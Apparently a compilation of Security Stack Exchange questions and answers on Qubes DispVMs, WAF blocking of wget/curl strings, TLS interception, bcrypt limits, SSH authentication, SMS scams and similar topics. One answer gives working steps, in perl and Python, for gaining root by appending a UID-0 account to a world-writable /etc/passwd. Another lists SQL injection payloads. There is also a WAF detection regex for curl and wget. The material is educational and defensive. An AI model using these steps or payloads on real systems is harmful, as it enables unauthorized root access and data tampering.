Open in DispVM or Run in DispVM ) from within a VM that is not connected to the Tor gateway, the new DisposableVM may route its traffic over clearnet. This is because DisposableVMs inherit their NetVMs from the calling VM (or the calling VM's dispvm_netvm setting if different).
The dispvm_netvm setting can be configured per VM by: dom0 → Qubes VM Manager → VM Settings → Advanced → NetVM for DispVM ." You'll need to set it to none so that it isn't connected to any network VM and won't have any Internet access. [3] : Edit: This answer mentions Subgraph OS; hopefully, once a Subgraph template VM is created for Qubes, you could use it within Qubes, thus making exploits much harder, since thanks to the integrated sandbox it would require a sandbox escape exploit as well as a Xen exploit to compromise your entire machine.
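As a rough illustration of the pixel-flattening idea described above (this is not Qubes' actual converter; it's a sketch that assumes poppler's pdftoppm tool and the img2pdf Python package are installed, and it should itself be run inside a throwaway VM):

import glob, subprocess
import img2pdf  # third-party package, assumed installed

def flatten_pdf(untrusted, trusted):
    # Render every page to plain raster pixels, discarding scripts,
    # embedded files and any other active PDF content
    subprocess.run(["pdftoppm", "-r", "150", "-png", untrusted, "page"],
                   check=True)
    # Rebuild a PDF that contains nothing but those pixels
    with open(trusted, "wb") as out:
        out.write(img2pdf.convert(sorted(glob.glob("page-*.png"))))

flatten_pdf("untrusted.pdf", "trusted.pdf")

As with the real tool, the price of keeping only pixels is a much larger output file.
| {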
"source": [
"https://security.stackexchange.com/questions/151300",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/139322/"
]
} |
151,362 | I just accidentally copy-pasted a wget command into the eBay search box and got an 'Access Denied' error page. It happens with wget http://google.com or curl http://google.com , or any other URL... It does seem to sanitise the input and remove slashes if you just enter a URL, but not if you precede it with wget or curl. What could they possibly be doing which causes a wget or curl command to bypass their sanitization and produce a different result? | I assume that ebay.com installed a Web Application Firewall, which recognizes your request as a possible attack. Therefore, your request is cancelled and you receive an HTTP 403 - Access Denied . The mod_security WAF for Apache, nginx and IIS behaves similarly: if it is in prevention mode, it will also respond with HTTP 403 by default [1]. Most WAFs have some kind of rule set. They check whether your request matches one of their rules, maybe with regular expressions. I assume further that one of those rules looks like (wget|curl) (http|https)://.* [2]. The "sanitizing" of double forward slashes in your URL most likely happens at the application level. Strings like asdf// will also be shortened to asdf . [1] https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#secdefaultaction [2] Skipped escaping of forward slashes for the sake of readability
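A toy illustration of how such a rule would fire (the regex is only the answer's guess at eBay's actual rule, recast in Python):

import re

# Hypothetical WAF rule resembling the one assumed above
RULE = re.compile(r"(wget|curl)\s+(http|https)://\S+", re.IGNORECASE)

def inspect(search_input):
    # A WAF in prevention mode blocks the request outright
    return 403 if RULE.search(search_input) else 200

print(inspect("wget http://google.com"))  # 403
print(inspect("red wagon wheel"))         # 200

A plain URL without the leading command name doesn't match, which is why it only gets the ordinary slash-sanitizing treatment instead.
| {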
"source": [
"https://security.stackexchange.com/questions/151362",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/139411/"
]
} |
151,700 | If I have a world-writable /etc/passwd file on a system, how can I escalate my privileges to root? I am currently an underprivileged user. The underlying OS is CentOS 7.2, in case you are wondering. I know that the passwd file is not normally world-writable; I am doing a challenge that presents this scenario. Any steps to exploitation would be greatly helpful. | Passwords are normally stored in /etc/shadow , which is not readable by users. However, historically, they were stored in the world-readable file /etc/passwd along with all account information. For backward compatibility, if a password hash is present in the second column in /etc/passwd , it takes precedence over the one in /etc/shadow . Historically, an empty second field in /etc/passwd means that the account has no password, i.e. anybody can log in without a password (used for guest accounts). This is sometimes disabled. If passwordless accounts are disabled, you can put in the hash of a password of your choice. You can use the crypt function to generate password hashes, for example perl -le 'print crypt("foo", "aa")' to set the password to foo . It's possible to gain root access even if you can only append to /etc/passwd and not overwrite the contents. That's because it's possible to have multiple entries for the same user, as long as they have different names: users are identified by their ID, not by their name, and the defining feature of the root account is not its name but the fact that it has user ID 0. So you can create an alternate root account by appending a line that declares an account with another name, a password of your choice and user ID 0.
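Putting those two steps together, a sketch in Python (the account name "evil" is purely illustrative; the crypt module is Unix-only):

import crypt  # Unix-only standard library module

# Same DES-crypt call as the perl one-liner: hash of "foo" with salt "aa"
password_hash = crypt.crypt("foo", "aa")

# /etc/passwd format is name:hash:UID:GID:comment:home:shell,
# so this declares a second UID-0 account under a new name
entry = "evil:%s:0:0::/root:/bin/bash" % password_hash
print(entry)

Appending the printed line to the world-writable /etc/passwd and then running su evil with the password foo should give a root shell.
| {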
"source": [
"https://security.stackexchange.com/questions/151700",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/105654/"
]
} |
151,754 | Assumptions: Normal LAMP web server running a web app (e.g. AWS EC2 + Apache2 + MySQL + PHP 7). Not directly targeted by some super-hacker or governmental organisation etc. Related to the point above, no social engineering, and the web app itself is secure. Targeted by whom? Automated scans and exploits. Are there others? Is running apt-get update && apt-get upgrade every so often enough to keep a web server secure? If not: what else should the 'average' web app programmer, who is also taking care of the server, do to keep the web server reasonably secure for a startup company? It depends... Yes, it always depends on many things. Please include assumptions for the most common cases (Pareto principle) that the common web app programmer may or may not be aware of. | You've removed a lot of problems that normally get you in trouble (namely, assuming that the app you're hosting is completely secure). From a practical perspective, you absolutely have to consider those. But presumably since you're aware of them, you have some protective measures in place. Let's talk about the rest, then. As a start, you probably shouldn't run an update "every so often". Most distros operate security announcement mailing lists, and as soon as a vulnerability is announced there, it's rather public (well, it often is before that, but in your situation you can't really monitor all the security lists in the world). These are low-traffic lists, so you should really subscribe to your distro's and upgrade when you get notifications from it. Often, a casually maintained server can be brute-forced or dictionary-attacked over a long period of time, since the maintainer isn't really looking for the signs. It's a good idea then to apply the usual counter-measures - no ssh password authentication, fail2ban on ssh and apache - and ideally to set up monitoring alerts when suspicious activity occurs. If that's out of your maintenance (time) budget, make a habit of logging in regularly to check those things manually. While not traditionally thought of as a part of security, you want to make sure you can bring up a new server quickly. This means server configuration scripts (tools like Ansible, Chef, etc. are useful in system administration anyway) and an automatic backup system that you've tested. If your server's been breached, you've got to assume it's compromised forever and just wipe it, and that sucks if you haven't been taking regular backups of your data.
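For the "check manually" habit, a tiny sketch of what that can look like (the log path is Debian/Ubuntu-style and just a stand-in for whatever your distro uses):

from collections import Counter

failures = Counter()
with open("/var/log/auth.log") as log:  # path varies by distro
    for line in log:
        if "Failed password" in line:
            # sshd logs "... Failed password for USER from IP port ..."
            words = line.split()
            failures[words[words.index("from") + 1]] += 1

for ip, count in failures.most_common(10):
    print(count, "failed logins from", ip)

A pile of failures from a single IP is exactly the pattern fail2ban automates away.
| {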
"source": [
"https://security.stackexchange.com/questions/151754",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/94032/"
]
} |
151,866 | I have viewed Gmail's certificate chain at my workplace, and I realised it's different. It looks like this: Root CA
Operative CA1
___________.net
mail.google.com When I get the certificate chain at home, it looks like this: GeoTrust Global CA
Google Internet Authority G2
*.google.com Obviously these certificates are issued by my company. I recently read some other thread on security.stackexchange, and they said the company is eavesdropping on the HTTPS communications (using an MITM proxy) to protect the internal network and the client machines against viruses. That means they can read all of my encrypted traffic sent via HTTPS, including this message too. If this is true, can I work around this? Or please correct me if I'm wrong. | Yes, a company doing SSL interception could in theory read all your traffic if you use the company network. Depending on where you live and what kind of contract you have, the company's ability to do this might also be part of the contract or working rules, which might additionally state that you are only allowed to use the company network for work-related purposes. Can I work around this? Yes, you might use a different machine and network, like your mobile phone, for your private, non-work-related traffic. Depending on the configuration of the firewall it might also be possible to use some VPN tunnel through the firewall. But doing so is usually explicitly forbidden, so you risk getting fired for it.
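If you want to check for yourself who issued the certificate your machine is actually seeing, here is a sketch using Python's standard library (run it on both networks and compare; on the work machine the corporate root CA must already be trusted for the handshake to succeed):

import socket, ssl

def issuer_of(host, port=443):
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port)) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
    # The issuer field names the CA that signed the certificate you received
    return dict(item[0] for item in cert["issuer"])

print(issuer_of("mail.google.com"))

At home this should name a Google/GeoTrust CA; behind an intercepting proxy it will name the company's CA instead.
| {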
"source": [
"https://security.stackexchange.com/questions/151866",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70916/"
]
} |
152,066 | If someone has the key and a valid referer, they can use the API key from any client as long as they set the referer header, correct? So is it worthwhile to use this restriction? | All security measures are trade-offs. Is the cost of the control worth more or less than the value of what is being protected, and how much more work does it force the attacker to do? A lock on your luggage may stop a casual thief from opening your bag to grab something, but it won't stop someone stealing your bag. But the cost is low, so it is still a useful security control. So, just because a malicious agent could copy the referrer header, they may not have the time or inclination to do so. Think of a valid referrer header like a concert wristband. Can you forge them, or sneak around the guard checking wristbands? Sure you can, but it doesn't make the band useless. It raises the cost for the attacker. Likewise, your standard, non-modified, well-behaved application will tell the truth about the last page it came from, and then will correctly be denied API access. Maybe somebody trying to abuse your service doesn't know you are checking referrer headers on the server, and will give up. So, in answer to OP's question, "worthwhile" is a value judgement only you can make. How much effort does it take you to check the referrer? Probably not much. How valuable is protecting use of your API key? Probably more. Is that amount of effort on your part worth the speedbump you'll place in the attacker's way? That last one is your call.
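As a sketch, the server-side check might look like this (the framework-agnostic style and the allow-list contents are assumptions):

ALLOWED_REFERERS = ("https://app.example.com/",)  # assumed allow-list

def referer_ok(headers):
    referer = headers.get("Referer", "")
    # A well-behaved client tells the truth here; a determined attacker
    # can forge the header, so treat this as a speedbump, not authentication
    return any(referer.startswith(ok) for ok in ALLOWED_REFERERS)

print(referer_ok({"Referer": "https://app.example.com/page"}))  # True
print(referer_ok({"Referer": "https://evil.example.net/"}))     # False
| {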
"source": [
"https://security.stackexchange.com/questions/152066",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/140157/"
]
} |
152,128 | More and more websites use randomized digit keypads for authentication instead of an ordinary typed password, with the digits in a different position every time. Could someone explain the idea behind this instead of the usual login and password? My guess is that it seems more secure because if you capture someone's traffic you'll only get the coordinates clicked, and these coordinates are different every time. But in this case the server has to transfer the position of each button to the client so that it can be displayed correctly (4 in the top left corner, 8 in the bottom left, etc.). If the traffic can be captured, then we can capture the position of each digit as well as the coordinates clicked afterwards. Why is it more secure than a common login/password over HTTPS encryption? | Using a randomized software keyboard for password input is based on the misconception that it can prevent key loggers. It can somewhat effectively prevent hardware key loggers from capturing the login data. In a weak sense, it also prevents some naive software key loggers from capturing login data; however, as you correctly mentioned, a slightly better keylogger can trivially take screencaps as well to defeat this measure, and a more sophisticated one can just install a browser add-on to capture the password before it's sent to the server. Since hardware key loggers are much rarer than software key loggers, on most sites where such a randomized software keyboard is implemented it is really only a sign that the developer doesn't realize such measures are ineffective against most keyloggers. | {
"source": [
"https://security.stackexchange.com/questions/152128",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/140184/"
]
} |
152,252 | Yesterday evening my Android phone (Google Play Services app) asked me to log in to my account again due to "security changes" (I don't remember the exact wording used). I double-checked it was the real app and logged in again (I went through all the authentication steps, including 2FA through SMS that was automatically picked up by the app). I then checked all my account activities and security settings, and found there were no signs of access or edits other than my own. Everything looked perfectly fine, including linked devices and apps. Should I worry, or is this a random check by Google to see if my access from the phone is still valid? (Or maybe Google Play Services just lost an auth token and asked me to log in again?) | Google says it's not a security problem and that you don't have to worry. After investigation they issued a statement in the Google product forums : What happened? During routine maintenance [from 1pm to midnight PST yesterday], a number of users were signed-out from their Google accounts. This may have resulted in you being signed out of your account or seeing a notification about “A change in your Google account” or “Account Action Required.” We hear your concerns that this appeared to potentially be phishing or another type of security issue. We can assure you that the security of your account was never in danger as a result of this issue. You can always learn more about the Security tools Google provides at www.google.com/safetycenter/ What should I do now? First, try signing back in with your usual username and password at accounts.google.com . If you can’t remember your password or can’t sign in for another reason, recover your account here: g.co/recover . Note that the statement only refers to this particular incident from around February 24th, 2017, which has affected many users and is likely harmless. But more generally, if Google is asking for a security confirmation or warning you about changed account details, you should take that seriously and review your security settings and recent logins - as you should do regularly anyway. | {
"source": [
"https://security.stackexchange.com/questions/152252",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/80617/"
]
} |
152,430 | When I generated a password for GitHub with KeePass, I got a message on the GitHub site saying that the limit for password length is 72 characters. It seemed weird that it wasn't a power of 2, so I googled a bit, and it appeared that 72 is the maximum number of bytes for the bcrypt algorithm. So it seems logical to restrict the length to 72, as longer passwords would be truncated to 72 anyway. Then I generated a password for Discord, and it appeared that the max length is 128 characters. But I thought I'd check whether the first 72 characters of my password would suffice. And yes, my 128-character password is also truncated to the first 72 characters, so I guess Discord is also using bcrypt. So the question is: is it better to just set the password length limit to 72 characters, or to let users choose longer passwords (how long? 128, 256 bytes?) even though they will be truncated? The first criterion is security, and only then usability, storage or difficulty of implementation. | I don't favor silent truncation because it misleads the users into thinking that their entire password was accepted when it wasn't. I'd prefer that a system just set a maximum length, if necessary, and restrict the user to that during password input. One bad scenario I've heard of is a code change that begins processing characters beyond the previous max length, so that suddenly users with longer passwords can't log in. The system only has a record of the first 72 characters, and their longer string doesn't match that without the old truncation behavior. That leads to frustrated users. As an alternative to truncation at 72 characters, you should consider pre-hashing the password with something like salted SHA-256. That allows the user's entire password string beyond 72 characters to be considered while still providing the computational protection of bcrypt. Please read the linked question and comments below to understand some of the security tradeoffs of this approach.
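A sketch of that pre-hash idea in Python (the bcrypt package is a third-party dependency, and the server-side pepper is this sketch's stand-in for "salted"):

import base64, hashlib, hmac
import bcrypt  # third-party package, assumed installed

PEPPER = b"server-side secret"  # assumed; keep it out of the database

def prehash(password):
    digest = hmac.new(PEPPER, password.encode(), hashlib.sha256).digest()
    # base64 keeps the value printable, NUL-free and under bcrypt's 72-byte cap
    return base64.b64encode(digest)

def hash_password(password):
    return bcrypt.hashpw(prehash(password), bcrypt.gensalt())

def verify(password, stored):
    return bcrypt.checkpw(prehash(password), stored)

Every character of an arbitrarily long password now influences the 44-byte value bcrypt actually sees.
| {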
"source": [
"https://security.stackexchange.com/questions/152430",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/111371/"
]
} |
152,594 | During SSHv2 connection initialization, there is the following debug message: debug1: Offering RSA public key: /home/user/.ssh/id_rsa Am I correct that actually no public key is sent to the server? In addition, /home/user/.ssh/id_rsa is my private key. What exactly does this Offering RSA public key message mean? | When the SSH client displays this message, it's trying to authenticate the user on the server ( userauth_pubkey in sshconnect2.c ). The client needs to demonstrate that it has the private key corresponding to a public key that is authorized on the server. The file name displayed in the debug message is the name of the private key file (e.g. passed as an argument to -i or as the IdentityFile configuration directive). At the point where this message is displayed, the client doesn't use the private key, only the public key. However, the client wants to know that the private key is available, because if the server agrees to use this public key then the client will have to demonstrate that it knows the private key. The client sends an SSH_MSG_USERAUTH_REQUEST message to the server with the publickey method containing the public key. If the server agrees to use this public key ("debug1: Server accepts key") then the client will later use the private key to sign a challenge sent by the server in another SSH_MSG_USERAUTH_REQUEST message (in sign_and_send_pubkey , the have_sig byte changes from 0 ("tell me if you like this key") to 1 ("here's a proof that I'm me, let me in")). | {
"source": [
"https://security.stackexchange.com/questions/152594",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/29200/"
]
} |
152,606 | I was reading about SQL injection and saw this, which got me thinking: input fields as small as possible to reduce the likelihood of a hacker being able to squeeze SQL code into the field without it being truncated (which usually leads to a T-SQL syntax error). Source: Microsoft SQL Server 2008 R2 Unleashed. What is the shortest field size where SQL injection can cause harm? With harm being database modification or returning results not intended by design. Including an end comment marker ( -- ) in a two-character field would not cause harm; it would just cause a failed query. The potential hacker might learn the field is susceptible to injection, but they are unable to leverage it. | No, there is no length that is too short to be exploitable (at least in some situations). A length filter is not a valid protection against SQL injection, and prepared statements really are the only proper defense. A length filter is however a good measure as defense in depth (as are integer filters, alphanum filters, etc). There are many situations where e.g. valid input could never be above, say, 30 characters, but where meaningful exploitation requires more. It should (but probably doesn't) go without saying that any filtering as defense in depth must take place server-side, as anything client-side can simply be bypassed.

Restriction Bypass
Restriction clauses (e.g. AND / OR ) can be bypassed with two characters, which can cause real harm, not just a failed query. The simplest example is a login (other examples would be the unauthorized deletion of additional data):
Example: SELECT * FROM users WHERE userid = [id] AND password = [password]
Injection: id = 1# password = wrong_password
Payload: 2 chars

DoS
DoS attacks require very few characters. In a MySQL example, it takes 7 for the actual call + x for the given seconds + whatever is needed to be able to call the function and fix the query.
Example: SELECT * FROM users WHERE userid = [id]
Injection (this is a valid injection, a longer form would be 1 AND sleep(99) ): sleep(99)
Payload: 9 chars

Reading Data
If the data is displayed, the length depends mainly on the table and column name. I'll assume an equal column count for all tables (it may happen, and it saves characters).
Example: SELECT * FROM comments WHERE commentid = [id]
Injection: 1 union select * from users
Payload: 27 chars

Editing Data
Unauthorized database modifications can also be achieved with few characters.
Example: UPDATE users SET password = '[password]' WHERE id = [id]
Injection (into password): ',isadmin='1
Payload: 12 chars
A restriction bypass would also work (the result is that all passwords are now empty*): '#
Payload: 2 chars

* The password example is used for simplicity; passwords should be hashed, making the example impossible. The example still applies in all similar situations (updating a username, updating permissions, and so on).
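To see why the two-character payload in the login example works, a harmless Python sketch that only prints the query a vulnerable string-concatenating application would build (MySQL treats # as a comment marker):

def build_query(user_id, password):
    # Vulnerable string concatenation, shown only to illustrate the payload;
    # real code should use prepared statements
    return ("SELECT * FROM users WHERE userid = %s AND password = '%s'"
            % (user_id, password))

print(build_query("1#", "wrong_password"))
# SELECT * FROM users WHERE userid = 1# AND password = 'wrong_password'

Everything after the # is a comment, so the password check disappears from the executed query.
| {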
"source": [
"https://security.stackexchange.com/questions/152606",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/24064/"
]
} |
152,854 | I routinely receive seemingly harmless SMS messages from unknown people. They're usually simple, like "Hi" or "Hello" or "Are you there?". This happens several times a week, and certainly often enough that it seems to be some sort of organized, ongoing effort to get me to reply. I'm trying to understand why someone (or several someones) would bother sending such messages. Is this a known hacking/phishing technique? If so, is there useful information that someone can obtain just by sending an SMS message, and what can be determined if the recipient replies (assuming they don't include any personal or security information in the reply)? | Some telephone or SMS numbers carry an additional charge that is automatically collected by your phone provider and passed on to the owner of the number. This is mainly used (legally) for some TV games where each participant pays a little money when calling a special number or sending an SMS. At the end, either one of the players earns something, or the answers of participants are used for a vote (a "Miss" election, for example). So a dishonest company could set up a system like that and send tons of SMSs asking for a reply to such an overcharged number - and conveniently omit to say that it is overcharged... The cost of mass-sending SMS is low, so if they get an acceptable return rate, they will earn some money with it. When you are aware of that, and willingly send an overcharged SMS to participate in the election of the song of the year, all is fine. But when you receive an SMS merely pretending to come from a friend and end up paying more than for a simple SMS, it is robbery. And as this kind of company hides abroad or vanishes as soon as you ask for your money back, it is much better to never send them any overcharged SMS. | {
"source": [
"https://security.stackexchange.com/questions/152854",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/3222/"
]
} |
152,893 | We are using a browser-based email client and the email content is in HTML. One of my employers told us that if we receive a suspicious email with links, we have to hover over the link (to check that it is not spoofed) before clicking it. Hovering over it triggers an action to display the underlying link in the browser's status bar. However, would someone be able to spoof this action and try to do something funny? This is a similar thread but it discusses thumbnails of attachments and not links in the email. | One of my employers told us that if we receive a suspicious email with links, we have to hover over the link (to check that it is not spoofed) before clicking it. When you mouseover a link, the value of the href attribute is displayed in the status bar. Since this is the link target, it can give you an idea about where the link is going. would someone be able to spoof this action and try to do something funny? Generally, yes. The actual link target can be "spoofed" using Javascript: it is quite common for websites to swap the href value for another link as soon as the user clicks on it. For example, you can observe this when visiting Google search results. When you mouseover one of the links, it will be displayed as https://security.stackexchange.com/... but as soon as you click it, that event is captured and you visit an intermediate site first ( https://www.google.com/url?... ) which redirects you to the actual target. But any well-designed (web-based) mail client will not execute any JS in HTML e-mails. Active script content in e-mails is dangerous - not only because it potentially results in an XSS flaw in the mail client, but because it can also be used to run JS-based exploits against the browser or simply inform the sender that you have opened the mail. So, if your mail client disallows JS in e-mails - which it most likely does - then the link displayed on mouseover is indeed the correct link target. But you should be aware of other attempts to deceive you, such as homograph attacks or an overly long URL that disguises the actual target domain. It's not as easy to analyze a URL in the status bar as it is looking at it in the address bar. In a more advanced attack, the attacker could also have compromised a legitimate site beforehand (e.g. through a persistent XSS flaw) and you won't be able to tell from the link at all that the site now actually hosts dangerous content. | {
"source": [
"https://security.stackexchange.com/questions/152893",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/34466/"
]
} |